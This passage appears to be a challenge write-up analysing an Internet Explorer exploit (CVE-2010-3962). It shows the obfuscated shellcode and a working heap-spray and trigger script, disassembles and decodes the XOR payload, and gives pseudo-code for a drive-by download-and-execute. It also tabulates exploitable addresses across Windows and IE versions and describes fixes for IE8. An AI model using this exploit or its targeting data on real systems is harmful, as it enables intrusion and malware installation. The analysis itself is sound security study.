	"wo0oFECBwo0o8FA1wo0o306Awo0oC3CAwo0o1AD3wo0oE0C4wo0oE2E3wo0oE4E5" +
	"wo0oE6E7wo0oE8E9wo0oD1E1wo0oA3D1wo0oFAB3wo0oA6D1wo0oFAB3wo0o9CD1" +
	"wo0o418Bwo0oD2D1wo0oD1D1wo0o98D1wo0o8994wo0o9D81wo0o839Ewo0oFF94" +
	"wo0o8994wo0oD194wo0oA1BEwo0oBFB4wo0oB9D1wo0oA5A5wo0oEBA1wo0oFEFE" +
	"wo0oA6A6wo0oFFA6wo0oB9B0wo0oBDBFwo0oB3B0wo0oB2FFwo0oBCBEwo0oBAD1" +
	"wo0oA8B4wo0oEBF1wo0oB9F1wo0oBDB4wo0oBEBDwo0o90F1wo0o9482wo0o9192" +
	"wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0" +
	"wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0oD1F0"
);
shellcode = unescape(shellcode_esc.replace(/wo0o/g,"%u"));

// Make the NOP sled. Lengths here are in bytes; each UTF-16 character
// of a JavaScript string occupies 2 bytes, hence the divisions by 2.
var nopsled_len = 0x86000 - (shellcode.length * 2);
nopsled_short = unescape(
	'%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090' +
	'%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090' +
	'%u9090%u9090%u9090%u9090%u9090%u9090%u9090');
while(nopsled_short.length < nopsled_len / 2)
{
	nopsled_short += nopsled_short;
}
var nopsled = nopsled_short.substring(0, nopsled_len / 2);

// Heap spray
mem = new Array();
for(i=0; i<1500; i++)
{
	mem[i] = nopsled + nopsled + shellcode;
}

// Exploit it!
document.write("<table style=position:absolute;clip:rect(0)>");

It is very easy to understand. `unescape'ing the long string expands it into the shellcode. The script then concatenates the shellcode with a very, very long NOP sled and heap-sprays it. After that it triggers the browser bug. From this script, I can guess some interesting things.

I guess the shellcode is run after the NOP sled, so I assume it is valid x86 code; now I decode and disassemble it.

; SHELLCODE header (disassembled by ndisasm 2.08)
; POC Hackers' Dream contest

; 1. jump near the payload
00000000  EB10              jmp short 0x12
; 3. ebx = return address pushed by the call, i.e. the absolute
;    address of the payload
; 4. decrypt the payload in place (xor 0xd1, 0x383 bytes).
;    note that ebx is pre-decremented: `loop' decrements ecx and
;    branches while ecx != 0, so the body runs for ecx = 0x383 .. 1
;    and byte [ebx+0] is never touched. Without the `dec ebx' the
;    first payload byte would stay encrypted (and one byte past the
;    payload would be clobbered), which causes a crash.
00000003  4B                dec ebx
00000004  33C9              xor ecx,ecx
00000006  66B98303          mov cx,0x383
0000000A  80340BD1          xor byte [ebx+ecx],0xd1
0000000E  E2FA              loop 0xa
; 5. run shellcode payload
00000010  EB05              jmp short 0x17
; 2. dummy call (to get current EIP)
00000012  E8EBFFFFFF        call dword 0x2
00000017  (encrypted payload following)

It is so obvious! The shellcode header XOR-decrypts the payload with the byte key 0xd1 and then runs the decrypted payload.
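As an added example (not part of the report), the three steps above in JavaScript: the `unescape("%uXXXX")` step as little-endian bytes, a recogniser for the 0x17-byte decoder stub from the disassembly that pulls out the key and the count, and an emulation of the `loop` with and without the `dec ebx'. The stub bytes are the first twelve words of the string in 2-1; the payload fed to the emulation is constructed here and is not the challenge's payload. One consistency check this makes easy: the string in 2-1 is 461 words, i.e. 922 = 0x17 + 0x383 bytes, so the count in `mov cx,0x383` covers exactly the rest of the string after the stub.

```javascript
// Added example (not from the report): the unescape step as bytes, a
// recogniser for the 0x17-byte XOR decoder stub disassembled above, and an
// emulation of its decryption loop, with and without the `dec ebx'.

// The first twelve words of the shellcode string as given in 2-1
// (the complete 0x17-byte stub plus the first encrypted payload byte).
const STUB_WORDS = 'wo0o10EBwo0o4B5Bwo0oC933wo0oB966wo0o0383wo0o3480wo0oD10Bwo0oFAE2'
                 + 'wo0o05EBwo0oEBE8wo0oFFFFwo0o38FF';

// unescape("%u10EB") produces one UTF-16 code unit, stored little-endian,
// so the bytes in memory are EB 10.  "wo0o" is the form before replace().
function unescapeU(str) {
  const words = str.replace(/wo0o/g, '%u').match(/%u[0-9a-fA-F]{4}/g) || [];
  const out = new Uint8Array(words.length * 2);
  words.forEach((w, i) => {
    const v = parseInt(w.slice(2), 16);
    out[2 * i] = v & 0xff;      // low byte first
    out[2 * i + 1] = v >>> 8;
  });
  return out;
}

// Stub pattern from the disassembly; null marks the two variable fields
// (the 16-bit count of `mov cx' and the 8-bit key of `xor byte').
const STUB = [
  0xEB, 0x10,                   // jmp short  -> call
  0x5B,                         // pop ebx     (= address of payload)
  0x4B,                         // dec ebx
  0x33, 0xC9,                   // xor ecx, ecx
  0x66, 0xB9, null, null,       // mov cx, imm16
  0x80, 0x34, 0x0B, null,       // xor byte [ebx+ecx], imm8
  0xE2, 0xFA,                   // loop
  0xEB, 0x05,                   // jmp short  -> payload
  0xE8, 0xEB, 0xFF, 0xFF, 0xFF, // call back to `pop ebx'
];

function parseStub(bytes) {
  if (bytes.length < STUB.length) return null;
  for (let i = 0; i < STUB.length; i++) {
    if (STUB[i] !== null && bytes[i] !== STUB[i]) return null;
  }
  return {
    count: bytes[8] | (bytes[9] << 8),   // 0x383 for this sample
    key: bytes[13],                      // 0xd1 for this sample
    payloadOffset: STUB.length,          // 0x17, the pushed return address
  };
}

// Emulation of the loop.  `loop' decrements ecx and branches while it is
// non-zero, so the body runs for ecx = count .. 1.  With the pre-decrement
// the bytes hit are payload[0 .. count-1]; without it they are
// payload[1 .. count]: byte 0 stays encrypted and one byte past the
// payload is clobbered.
function xorDecodeLikeStub(buf, payloadOffset, count, key, predecrement = true) {
  const out = Uint8Array.from(buf);
  const ebx = payloadOffset - (predecrement ? 1 : 0);
  for (let ecx = count; ecx !== 0; ecx--) out[ebx + ecx] ^= key;
  return out;
}

// Constructed demo (NOT the challenge's payload): four plaintext bytes
// XOR-encrypted with the stub's key, placed right after the real stub,
// followed by a sentinel byte that shows the off-by-one.
function demo() {
  const stub = unescapeU(STUB_WORDS).slice(0, STUB.length);
  const info = parseStub(stub);
  const plain = Uint8Array.from([0x90, 0x90, 0xcc, 0xc3]);
  const buf = new Uint8Array(STUB.length + plain.length + 1);
  buf.set(stub, 0);
  plain.forEach((b, i) => { buf[STUB.length + i] = b ^ info.key; });
  buf[STUB.length + plain.length] = 0xaa;  // sentinel
  const ok = xorDecodeLikeStub(buf, info.payloadOffset, plain.length, info.key, true);
  const bad = xorDecodeLikeStub(buf, info.payloadOffset, plain.length, info.key, false);
  return { info, plain, ok, bad };
}
```

To decrypt the real payload, run `unescapeU` on the complete string from 2-1 and call `xorDecodeLikeStub(bytes, 0x17, 0x383, 0xd1)`; the result is what the next section disassembles.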

2-2. Decrypted Payload

By decrypting the payload the same way its header does, I found some interesting strings.

I believe the string beginning with 'key : ' is the key.

At first I thought this part of the string was just a placeholder, and that the REAL key would appear after `running' the shellcode, but this part is not modified during shellcode execution.

FYI, I will show the pseudo-code of shellcode activity.

// CAUTION: This is pseudo-code.
// The real shellcode is more complicated and `dangerous'.
HINSTANCE hInstance;
char file1[256];
char file2[256];

// resolve the addresses of the APIs it needs
hInstance = /* known address of kernel32.dll */;
GetProcAddress(hInstance, "LoadLibraryA");
GetProcAddress(hInstance, "GetTempPathA");
GetProcAddress(hInstance, "WinExec");
GetProcAddress(hInstance, "DeleteFileA");
GetProcAddress(hInstance, "Sleep");
hInstance = LoadLibraryA("msvcrt");
GetProcAddress(hInstance, "exit");
GetProcAddress(hInstance, "fopen");
GetProcAddress(hInstance, "fread");
GetProcAddress(hInstance, "fwrite");
GetProcAddress(hInstance, "fclose");
hInstance = LoadLibraryA("urlmon");
GetProcAddress(hInstance, "URLDownloadToFileA");
hInstance = LoadLibraryA("shell32");
GetProcAddress(hInstance, "ShellExecuteA");
GetProcAddress(hInstance, "SHGetSpecialFolderPathA");

// drive-by download!
GetTempPathA(256, file1);
strcat(file1, "log.gif");
/*** NOTE THAT THE URL HAS BEEN NEUTRALIZED, ***/
/*** SO THE DRIVE-BY DOWNLOAD DOES NOT WORK. ***/
URLDownloadToFileA(NULL, " : hello ASEC@!@!@!@!@!@!@!@!@!@!@!@!@!", file1, 0, NULL);
SHGetSpecialFolderPathA(NULL, file2, CSIDL_APPDATA, FALSE);
strcat(file2, "\\alg.exe");
MALICIOUS_GENERATE_CODE(file1, file2); // generate PE file `file2' from `file1'.
WinExec(file2, SW_HIDE);
Sleep(1000);
DeleteFileA(file1);

// show another web page
ShellExecuteA(NULL, "open", "IEXPLORE.EXE", "http://www.ahnlab.com", NULL, SW_SHOWMAXIMIZED);

// close the current browser
exit( /* unpredictable value */ );

None of these activities modify the key string, at all. So I believe this key string IS THE KEY.

2-3. Differences between OSes

This payload is a bit OS-dependent, because part of it expects the DLL code to be laid out in a specific way. I will show you a part of the payload disassembly.

; 0. ebx = "msvcrt"
00000035  8BDC              mov ebx,esp
; 1. jump
00000037  EB10              jmp short 0x49
; 3-1. push "msvcrt"
00000039  53                push ebx
; 3-2. push 'ret' instruction
0000003A  FF7634            push dword [esi+0x34]
; 3-3. avoid breakpoints?
0000003D  8BFF              mov edi,edi
0000003F  55                push ebp
00000040  8BEC              mov ebp,esp
; 3-4. edx = &LoadLibraryA
00000042  8B16              mov edx,[esi]
; 3-5. edx = &LoadLibraryA + 5;
;      the first 5 bytes of LoadLibraryA are executed by the
;      payload itself (3-3 above); they must be exactly:
;      - mov  edi, edi
;      - push ebp
;      - mov  ebp, esp
00000044  8D5205            lea edx,[edx+0x5]
; 3-6. call LoadLibraryA(+5)
00000047  FFE2              jmp edx
; 2. push return address
00000049  E8EBFFFFFF        call dword 0x39

This continues execution 5 bytes after the beginning of the LoadLibraryA function (probably to avoid breakpoints set on its entry). For this to work, the first 5 bytes (3 instructions) of the function must have exactly the form above. This is the Windows HotPatch-specific function prologue.

But LoadLibraryA in Windows XP SP0 and SP1 has a different function prologue, because those are not HotPatch builds. So on these OS versions the payload ends up with an inconsistent stack and just crashes.

Windows XP SP2 is the first operating system version with HotPatch images, so the target (client) OS is Windows XP SP2 or later.

Moreover, this exploit does not work when DEP is on. That means the set of target OSes is very limited.

2-4. Differences between IE versions

By googling, I found that this vulnerability is CVE-2010-3962. The site above says the shellcode is very IE-version specific (more specifically, mshtml.dll version specific) and that the EIP value is not controllable by the exploit. I made my own payload and ran it on several combinations of IE and OS. Note that I tried the `decoded' shellcode, not the `aaencode'd one.

combination                                                     | DEP on IE    | ASLR on IE  | aaencode works | mshtml.dll base tested | decoded exploit/payload works
----------------------------------------------------------------+--------------+-------------+----------------+------------------------+--------------------------------------------------------------------
XP x86 SP0 (en) / IE6 (mshtml: 6.0.2600.0)                      | none         | none        | no             | 74810000               | no - payload incompatible (INEXPLOITABLE EIP: 0xB87493AD)
XP x86 SP1 (en) / IE6 (mshtml: 6.0.2800.1106)                   | none         | none        | no             | 74810000               | no - payload incompatible (INEXPLOITABLE EIP: 0x84748A62)
XP x86 SP2 (en) / IE6 (mshtml: 6.0.2900.2180)                   | default no   | none        | no             | 7D4A0000               | no (INEXPLOITABLE EIP: 0xCE7D4F7C)
XP x86 SP2 (en) / IE6 (mshtml: 6.0.2900.3698)                   | default no   | none        | no             | 7DC30000               | default yes (exploitable EIP: 0x5C7DC9D0)
XP x86 SP3 (en) / IE6 (mshtml: 6.0.2900.5969)                   | default no   | none        | no             | 7DC30000               | no (INEXPLOITABLE EIP: 0xDC7DC9D0)
XP x86 SP3 (en) / IE6 (mshtml: 6.0.2900.6003)                   | default no   | none        | no             | 7DC30000               | no (INEXPLOITABLE EIP: 0x837DC9D0)
XP x86 SP3 (en) / IE6 (mshtml: 6.0.2900.6036)                   | default no   | none        | no             | 7DC30000               | default yes (exploitable EIP: 0x0E7DC9CD)
XP x86 SP2 (en) / IE7 (mshtml: 7.0.5730.13)                     | default no   | none        | no             | 7E830000               | default yes (exploitable EIP: 0x597E85F9)
XP x86 SP3 (en) / IE7 (mshtml: 7.0.5730.13)                     | default no   | none        | no             | 7E830000               | default yes (exploitable EIP: 0x597E85F9)
XP x86 SP3 (en) / IE7 (mshtml: 7.0.6000.17080)                  | default no   | none        | no             | 3CEA0000               | default yes (exploitable EIP: 0x303CEEBB)
XP x86 SP3 (en) / IE7 (mshtml: 7.0.6000.17092)                  | default no   | none        | no             | 3CEA0000               | no (INEXPLOITABLE EIP: 0xF83CEEBB)
XP x86 SP2 (en) / IE8 (mshtml: 8.0.6001.18702)                  | default no   | none        | yes            | 63580000               | no - exploit incompatible (possibly exploitable EIP: 0x646367B2)
XP x86 SP3 (en) / IE8 (mshtml: 8.0.6001.18702)                  | default yes  | none        | yes            | 63580000               | no - exploit incompatible (possibly exploitable EIP: 0x646367B2)
XP x86 SP3 (en) / IE8 (mshtml: 8.0.6001.18939)                  | default yes  | none        | yes            | 3CEA0000               | no - exploit incompatible (possibly exploitable EIP: 0x1D3CF5BD)
XP x86 SP3 (en) / IE8 (mshtml: 8.0.6001.18975)                  | default yes  | none        | yes            | 3CEA0000               | no - exploit incompatible (possibly exploitable EIP: 0x4D3CF5BF)
XP x64 SP1 (en) / IE6 (mshtml: 6.0.3790.2643 ; 32-bit)          | default no   | none        | no             | 4A500000               | no (INEXPLOITABLE EIP: 0x9B4A5B08)
XP x64 SP2 (en) / IE6 (mshtml: 6.0.3790.3959 ; 32-bit)          | default no   | none        | no             | 02580000               | default yes (exploitable EIP: 0x5102A2B7)
XP x64 SP2 (en) / IE6 (mshtml: 6.0.3790.4772 ; 32-bit)          | default no   | none        | no             | 02490000               | no (INEXPLOITABLE EIP: 0x910292B7)
XP x64 SP2 (en) / IE7 (mshtml: 7.0.5730.13 ; 32-bit)            | default no   | none        | no             | 63580000               | default yes (exploitable EIP: 0x59635AF9)
XP x64 SP2 (en) / IE7 (mshtml: 7.0.6000.17092 ; 32-bit)         | default no   | none        | no             | 3F9A0000               | no (INEXPLOITABLE EIP: 0xF83F9EBB)
XP x64 SP2 (en) / IE8 (mshtml: 8.0.6001.18702 ; 32-bit)         | default no   | none        | yes            | 63580000               | no - exploit incompatible (possibly exploitable EIP: 0x646367B2)
XP x64 SP2 (en) / IE8 (mshtml: 8.0.6001.18975 ; 32-bit)         | default no   | none        | yes            | 3F9A0000               | no - exploit incompatible (possibly exploitable EIP: 0x4D3FA5BF)
Svr2k3 x86 SP0 (en) / IE6 (mshtml: 6.0.3790.0)                  | none         | none        | no             | 745E0000               | no - payload incompatible (INEXPLOITABLE EIP: 0xAD745E3F)
Svr2k3 x86 SP0 (en) / IE6 (mshtml: 6.0.3790.630)                | none         | none        | no             | 77380000               | no - payload incompatible (exploitable EIP: 0x117745FE)
Svr2k3 x86 SP1 (en) / IE6 (mshtml: 6.0.3790.1830)               | default yes  | none        | no             | 7D0E0000               | no (INEXPLOITABLE EIP: 0xA17D1900)
Svr2k3 x86 SP1 (en) / IE6 (mshtml: 6.0.3790.3304)               | default yes  | none        | no             | 4A500000               | default no - blocked by DEP (exploitable EIP: 0x324A5B06)
Svr2k3 x86 SP2 (en) / IE6 (mshtml: 6.0.3790.4470)               | default yes  | none        | no             | 7F9E0000               | no (INEXPLOITABLE EIP: 0xB17FABB7)
Svr2k3 x64 SP1 (en) / IE6 (mshtml: 6.0.3790.1830 ; 32-bit)      | default yes  | none        | no             | 7D0E0000               | no (INEXPLOITABLE EIP: 0xA17D1900)
Svr2k3 x64 SP1 (en) / IE6 (mshtml: 6.0.3790.3304 ; 32-bit)      | default yes  | none        | no             | 4A500000               | default no - blocked by DEP (exploitable EIP: 0x324A5B06)
Vista x86 SP0 (en) / IE7 (mshtml: 7.0.6000.16386)               | default yes* | default yes | no             | 6D440000               | no (INEXPLOITABLE EIP: 0xE36D48B9)
Vista x86 SP1 (en) / IE7 (mshtml: 7.0.6001.18000)               | default yes* | default yes | no             | 6BB60000               | default no (exploitable EIP: 0x596BC2FE / can vary)

The target script won't run on IE8 because the heap-spray code is WRONG for this version of the browser. The target script uses /* deobfuscated form */ mem[i] = nopsled + nopsled + shellcode; for the heap spray, but in IE8 this concatenation is turned into a pointer copy (not a content copy!). So in IE8 the target script no longer heap-sprays at all. This is amazing! None of the browsers can actually run the exploit in Web-Challenge.html without decoding it! How safe it is! To make the shellcode run, we have to use the `substring' (or `substr') method to force IE8 to do a content copy instead of a pointer copy. (Even then, the exploit can fail because the heap spray fails. I did not care whether the heap spray fails.)

The second notable thing is that the address is indeed mshtml.dll dependent, but it can also vary between platforms. Look at IE7 with mshtml version 7.0.5730.13: it has the same exploit EIP (0x597E85F9) on the x86 editions, but the x64 edition has a different exploit EIP (0x59635AF9). This is because the load base address of mshtml.dll is different (even though exactly the same binary is loaded, the exploit EIP differs).

Others...